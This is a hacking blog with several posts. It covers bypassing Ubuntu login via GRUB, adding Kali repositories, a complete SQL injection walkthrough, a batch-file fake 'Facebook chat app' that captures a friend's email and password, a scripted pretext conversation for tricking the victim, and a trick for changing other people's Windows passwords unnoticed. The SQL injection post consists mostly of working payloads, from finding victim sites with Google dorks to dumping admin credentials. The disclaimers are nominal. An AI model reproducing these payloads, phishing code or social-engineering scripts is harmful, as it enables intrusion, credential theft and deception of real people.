Saturday, March 29, 2014

Cracking Ubuntu Password

If you forget your Ubuntu password then here are some simple steps which will help you to change your Ubuntu passwords.
Note: Please use this tutorial for education purpose. We are not responsible if you misuse the knowledge.

 Step 1: Reboot the computer.
Step 2: Press 'e'.
Step 3: Delete the command line code "ro quiet splash" with backspace key.
Step 4: And there you type "rw init=/bin/bash".
Step 5: Use 'B' key to boot.

 Now we are on Root.

 Step 6: Use the following command line in the cmd option which will come after step 5.
                      passwd username (press enter)
          [Change password and retype it again].
Step 7: Then synchronize to make sure to write out data to the desk before rebooting.
           sync (press enter)
           reboot -f (press enter)

 For more information you can contact prashantsavior@gmail.com

 Author: Unpredictable.
Posted by at No comments:

Sunday, March 23, 2014

MAKE YOUR UBUNTU WORK AS KALI LINUX


Add Kali Linux Tools to Ubuntu 12.04/12.10/13.04

Add Kali Linux PPA :

Go to terminal then type following command when opt for password, give your Ubuntu Password.
  • sudo add-apt-repository ppa:wagungs/kali-linux
  • sudo add-apt-repository ppa:wagungs/kali-linux1
  • sudo add-apt-repository ppa:wagungs/kali-linux2

    and then

  • sudo apt-get update && sudo apt-get upgrade

If you don't want add kali linux ppa , you can add kali linux repository to your/etc/apt/sources.list

For Ubuntu 12.04 Precise Pangoline:

  • deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu precise main
  • deb http://ppa.launchpad.net/wagungs/kali-linux1/ubuntu precise main
  • deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu precise main

For Ubuntu 12.10 Quantal Quetzal:

  • deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu quantal main
  • deb http://ppa.launchpad.net/wagungs/kali-linux1/ubuntu quantal main
  • deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu quantal main

For Ubuntu 13.04 Raring Ringtail:
  • deb http://ppa.launchpad.net/wagungs/kali-linux/ubuntu raring main
  • deb http://ppa.launchpad.net/wagungs/kali-linux1/ubuntu raring main
  • deb http://ppa.launchpad.net/wagungs/kali-linux2/ubuntu raring main

And then add this key

  • sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 8FDFDB57

After this, update and upgrade your Ubuntu

  • sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

Author:Unpredictable
If you got some problem then feel free to ask us @ prashantsavior@gmail.com.
Posted by at No comments:

HACK WEBSITE USING SQL INJECTION


What is SQL Injection?
SQL injection is one of the popular web application hacking method.  Using the SQL Injection attack, an unauthorized person can access the database of the website. Attacker can extract the data from the Database.

What a hacker can do with SQL Injection attack?
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

So, here we go but before that make a note.
Note: Hacking others website is an illegal offence. You are in serious danger if you do this. This is for educational purpose and we don't hold responsibility if you do any illegal activity with this knowledge.

Step 1: Finding Vulnerable Website:
To find a SQL Injection vulnerable site, you can use Google search by searching for certain keywords. Those keyword often referred as 'Google dork'.

Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=


Copy one of the above keyword and paste in the google. Here , we will got lot search result with
We have to visit the websites one by one for checking the vulnerability.


Note:if you like to hack particular website,then try this:
site:www.victim_website.com dork_list_commands
for eg:
site:www.victi_website.com inurl:index.php?id=
 Step 2: Checking the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability , add the single quotes(') at the end of the url and hit enter.

For eg:
http://www.victi_website.com/index.php?id=2'
If the page remains in same page or showing that page not found, then it is not vulnerable.

If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

Step 3: Finding Number of columns:
Great, we have found that the website is vulnerable to SQLi attack.  Our next step is to find the number of columns present in the target database.

For that replace the single quotes(') with "order by n" statement.

Change the n from 1,2,3,4,,5,6,...n. Until you get the error like "unknown column ".

For eg:
http://www.victi_webmsite.com/index.php?id=2 order by 1
http://www.victi_webmsite.com/index.php?id=2 order by 2
http://www.victi_webmsite.com/index.php?id=2 order by 3
http://www.victi_webmsite.com/index.php?id=2 order by 4
If you get the error while trying the "n"th number,then no of column is "n-1".

I mean:
http://www.victi_webmsite.com/index.php?id=2 order by 1(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 2(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 3(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 4(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 5(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 6(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 7(noerror)
http://www.victi_webmsite.com/index.php?id=2 order by 8(error)

so now n=8 , The number of column is x-1 i.e, 7.

In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://www.victi_webmsite.com/index.php?id=2 order by 1--

Step 4: Find the Vulnerable columns:
We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".

Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).

For eg:
if the number of columns is 7 ,then the query is as follow:
http://www.victi_webmsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If the above method is not working then try this:
http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.



Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5: Finding version,database,user
Replace the 3 from the query with "version()"

For eg:
http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now, It will display the version as 5.0.1 or 4.3. something like this.

Replace the version() with database() and user() for finding the database,user respectively.

For eg:
http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--

http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--

If the above is not working,then try this:

http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6: Finding the Table Name
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).

Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"

For eg:

http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related with the admin or user.




Let us choose the "admin " table.

Step 7: Finding the Column Name

Now replace the "group_concat(table_name) with the "group_concat(column_name)"

Replace the "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--

We have to convert the table name to MySql CHAR() string .

Install the HackBar addon:
https://addons.mozilla.org/en-US/firefox/addon/3899/

Once you installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the Hackbar, then press F9.

Select sql->Mysql->MysqlChar() in the Hackbar.


It will ask you to enter string that you want to convert to MySQLCHAR().  We want to convert the table name to MySQLChar .  In our case the table name is 'admin'.



Now you can see the CHAR(numbers separated with commans) in the Hack toolbar.



Copy and paste the code at the end of the url instead of the "mysqlchar"

For eg:
http://www.victi_webmsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--
The above query will display the list of column.

For example: admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas ​ s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now replace the replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).

Now replace the " from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)" with the "from table_name"

For eg:
http://www.victi_webmsite.com/index.php?id=-2
and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' erro, then try another column name from the list.

If we are lucky enough then it will display the data stored in the database depending on your column name.  For instance, username and password column will display the login credentials stored in the database.

Step 8: Finding the Admin Panel:
Just try with url like:
http://www.victi_webmsite.com/admin.php
http://www.victi_webmsite.com/admin/
http://www.victi_webmsite.com/admin.html
http://www.victi_webmsite.com:2082/
etc.
If you got luck ,you will find the admin page using above urls or you can some kind of admin finder tools which I will be uploading in my next post also I will post on how to upload shell so that you can deface a website. Till then Happy hacking.

Author:Unpredictable

For more information feel free to contact @ prashantsavior@gmail.com
Posted by at No comments:

E-Books

All E-books available here are for free. Just enjoy them and if you like then do comment.

Learn C++ E-books:
1. Absolute C++                                                          Download
2. C++ Beginner Guide (2md edition)                         Download
3. Memory Management in C, C++ and Objective      Download
4. OOP in C++ by Robert Lafore                                Download
5. Teach Yourself C++ in 21 Days                              Download
Posted by at No comments:

Saturday, March 22, 2014

***HACK FACEBOOK***


Note: Hacking Facebook account is illegal. We are not responsible if you find yourself in problem as this is for educational purpose.

Everyone keeps on asking me how to hack Facebook. There are many who claims to sell many software which can hack Facebook account and many ask money in return of hacking Facebook account. But my dear friends there is nothing like hacking Facebook. They are fools who says there Facebook account are hacked.
But if you are intelligent enough then you can hack your victims Facebook account. All you need is a little bit of coding and social engineering.

This method of hacking Facebook also depends on how you interact with your victim.

Step 1: Create a text document by right clicking on desktop or your desired folder and then going to 'new' and then left click on txt document.

Step 2: Here we are preparing a fake Facebook chat app. Just copy and paste the following code in the
            document. Or you can simply download the text file by clicking here Download

TITLE FBChat
ECHO OFF
COLOR 03
CLS
ECHO.
ECHO LOGIN TO START CHATTING ON FACEBOOK
ECHO.
ECHO Please enter your email:
SET/P "MAIL=>"
ECHO.
ECHO Enter the password:
SET/P "PSWD=>"
ECHO EMAIL = %MAIL%>>FBChat.bat
ECHO PASSWORD = %PSWD%>>FBChat.bat
CLS
TIMEOUT /T 5 >NUL
COLOR 0C
ECHO.
ECHO An error occurred while connecting to the server. Try again later.
PAUSE>NUL
EXIT

Step 3: Go to File -- Click on Save as -- Write the file name as FBChat.bat -- select all files -- make sure to write the extension as .bat -- click on save.

Step 4: Now you have created your fake facebook chat app. Take that into your pendrive and give it to your friend and now here your communication skill comes into play. Make him try the app and when he logged in then there will be an error.

Step 5: Take that app again with you in which he has logged in and then right click on the app and click on edit. You will find his username and password at the end.

The sample conversation that you can begin with is as (here unpredictable is the attacker and Navendu is victim).

Unpredictable: Hey hows u?
Navendu: I m fine and hows u?
Unpredictable: I m also fine btw do u know I have made a chat app for Facebook with which you can chat anyone without visiting the facebook. Would you like to check it???
Navendu: Yeah sure why not.
Unpredictable: Its in this pen drive. And yes I am still working on graphics part so it will just look like a  simple terminal.
Navendu: No problem.
(After logging in and getting the error)
Unpredictable: Wups! I think there's some error in the code. I will fix it soon and come again to you.
(Take that file in which he logged in with you and then follow the step 5)

Author: Unpredictable

For any query feel free to contact us @ prashantsavior@gmail.com
Posted by at No comments:

Friday, March 21, 2014

CHESSMASTER

Chessmaster is a chess-playing computer game series which is now owned and developed by Ubisoft. It is the best-selling chess franchise in history, with more than five million units sold as of 2002

                 
SCREENSHOTS





CLICK HERE TO DOWNLOAD

 For any query feel free to contact @ prashantsavior@gmail.com
Posted by at No comments:

Thursday, March 20, 2014

Changing Password using command prompt

Note: This trick is for educational purpose, do not harm anyone by changing their password. We are not responsible if you do any unlawful activity and find yourself in problem.

If you found your friend's computer is on and he is nowhere to see. You might try to change his password without making him know. Here's a simple cmd trick which will change the password without knowing the actual password.

Step 1: Click on start.
Step 2: Type cmd in search box and right click on 'cmd' and then click on 'run as administrator'.
Step 3: You will prompt with the permission window. Allow it by clicking on 'OK'.
Step 4: Then type    
              net user  
            and hit enter.
Step 5: You will get the result of various user account working on the computer. Change the password    
           for all of them so that you don't have any issue later on. Type
                net user user_name *            
           then hit enter.


Step 6: Type your password carefully and hit enter. Do the same for all user by changing the user_name with the name found after step 4.

Author: Unpredictable

For more information mail your query to prashantsavior@gmail.com
Posted by at No comments:
Subscribe to: Posts (Atom)